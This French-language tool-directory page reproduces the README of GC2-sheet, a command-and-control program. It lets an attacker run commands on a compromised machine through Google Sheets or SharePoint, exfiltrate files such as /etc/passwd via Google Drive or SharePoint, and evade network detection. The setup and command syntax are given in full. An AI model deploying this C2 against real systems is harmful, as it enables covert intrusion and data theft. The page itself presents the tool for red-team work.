Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
GC2-sheet — GC2 est une application de commande et de contrôle qui permet à un attaquant d'exécuter des commandes sur la machine cible en utilisant Google Sheet ou Microsoft SharePoint List et d'exfiltrer des fichiers via Google Drive ou Microsoft SharePoint Document. | Kitploit
Outils/GitHubGitHub/loociprian/gc2-sheet
Exfiltration de DonnéesAnalyse de MalwareCommandement et ContrôleRed TeamingOutil d'Accès à Distance
GitHubloociprian/gc2-sheet

GC2-sheet

GC2 est une application de commande et de contrôle qui permet à un attaquant d'exécuter des commandes sur la machine cible en utilisant Google Sheet ou Microsoft SharePoint List et d'exfiltrer des fichiers via Google Drive ou Microsoft SharePoint Document.

Voir le dépôt
64912142il y a 3 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

GC2

Logo

GC2 (Google Command and Control) est une application de commande et de contrôle qui permet à un attaquant d'exécuter des commandes sur la machine cible en utilisant Google Sheet ou Microsoft SharePoint List et d'exfiltrer des fichiers via Google Drive ou Microsoft SharePoint Document.

Pourquoi

Ce projet a été développé pour fournir une commande et de contrôle qui ne nécessite aucune configuration particulière (comme un domaine personnalisé, VPS, CDN, ...) lors des activités de Red Teaming.

De plus, le programme n'interagira qu'avec les domaines de Google et Microsoft (comme *.google.com) pour rendre la détection réseau plus difficile.

Flux de travail

Google

Flux de travail

Microsoft

Flux de travail

Fonctionnalités

  • Exécution de commandes en utilisant Google Sheet ou Microsoft SharePoint List comme console
  • Téléchargement de fichiers sur la cible en utilisant Google Drive ou Microsoft SharePoint Document
  • Exfiltration de données en utilisant Google Drive ou Microsoft SharePoint Document
  • Interrupteur d'auto-destruction et suppression automatique de la machine cible

Exécution de commandes

Google

Une Google Sheet sera automatiquement créée par le C2. Une fois créée, vous pouvez interagir avec le système compromis comme indiqué ci-dessous.

Permission de la feuille

Microsoft

Une Microsoft SharePoint List sera automatiquement créée par le C2. Une fois créée, vous pouvez interagir avec le système compromis comme indiqué ci-dessous.

Permission de la feuille

Fichier d'exfiltration de données

Une commande spéciale est réservée pour exfiltrer des fichiers du système cible.

From Target to Google Drive/Microsoft SharePoint Document
upload;<local path>
Example:
upload;/etc/passwd

Note : les fichiers portant le même nom sont automatiquement écrasés.

Téléchargement de fichiers

Une commande spéciale est réservée pour télécharger des fichiers sur le système cible.

Google

From Google Drive to Target
download;<google drive file id>;<local path>
Example:
download;<file ID>;/home/user/downloaded.txt

Microsoft

Note : Les fichiers doivent être enregistrés dans le dossier racine SharePoint, généralement "Documents"

From SharePoint to Target
download;<SharePoint file path>;<local path>
Example:
download;download.txt;/home/user/downloaded.txt

Sortie

En envoyant la commande exit, le C2 se tuera et se supprimera du système cible.

PS : D'après la documentation de os : Si un lien symbolique a été utilisé pour démarrer le processus, selon le système d'exploitation, le résultat peut être le lien symbolique ou le chemin vers lequel il pointe. Dans ce cas, le lien symbolique est supprimé.

Configuration

Ce C2 prend en charge à la fois les services Google (Google Sheet + Google Drive) et Microsoft (SharePoint Lists + SharePoint Document). Pour utiliser le C2, vous devez configurer à la fois la configuration locale et cloud.

Configuration cloud

Google

  1. Créez un nouveau « compte de service » Google

    Créez un nouveau « compte de service » Google en utilisant https://console.cloud.google.com/, créez un fichier de clé .json pour le compte de service.

  2. Activez l'API Google Sheet et l'API Google Drive

    Activez l'API Google Drive https://developers.google.com/drive/api/v3/enable-drive-api et l'API Google Sheet https://developers.google.com/sheets/api/quickstart/go.

  3. Configurez Google Sheet et Google Drive

    Créez une nouvelle Google Sheet et partagez-la (en tant qu'éditeur) avec le compte de service (en utilisant son adresse e-mail).

    Permission de la feuille

    Créez un nouveau dossier Google Drive et partagez-le (en tant qu'éditeur) avec le compte de service (en utilisant son adresse e-mail).

    Permission de la feuille

Microsoft

Pour interagir avec les services Microsoft, vous aurez d'abord besoin d'un abonnement Business (vous pouvez en obtenir un gratuitement pendant les 30 premiers jours).

  1. Créez une application Azure

    Créez une nouvelle application Azure comme décrit ici https://learn.microsoft.com/en-us/graph/auth-v2-service?tabs=http

    Permission de la feuille

    Après avoir créé la nouvelle application, activez les API Graph suivantes :

    • Sites.ReadWrite.All
    • Files.ReadWrite.All

    Permission de la feuille

Configuration locale

  1. Téléchargez le C2

    Le C2 peut être cloné directement depuis GitHub :

    git clone https://github.com/looCiprian/GC2-sheet
    cd GC2-sheet
    
  2. Configurez le C2

    Pour configurer le C2, vous devez modifier le fichier cmd/options.yml. Le C2 prend en charge à la fois les services Google et Microsoft, il est également possible de les mélanger.

    Services Google uniquement

    CommandService: "Google" # Google Sheet will be used as command service to pull commands and push commands' output
    FileSystemService: "Google" # Google Drive will be used as file system to download and exfiltrate files
    GoogleServiceAccountKey : "1234567890" # your escaped json file
    GoogleSheetID: "0987654321" # your Google Sheet ID (can be found in the URL)
    GoogleDriveID: "1234554321" # your Google Drive folder ID (can be found in the URL)
    #RowId: 1 # optional, specify from which (Google Sheet or SharePoint List) row the beacon should pull new commands
    #Proxy: "http://127.0.0.1:8080" # optional, specify the proxy
    Verbose: true # optional, suggested for debugging purposes
    

    Votre clé de compte de service Google doit être échappée avant de la coller dans le fichier de configuration. Vous pouvez utiliser la commande suivante pour l'échapper :

    cat key.json | jq -r @json | sed 's/\\n/\\\\n/g' | sed 's/\"/\\"/g'
    
Télécharger l’outil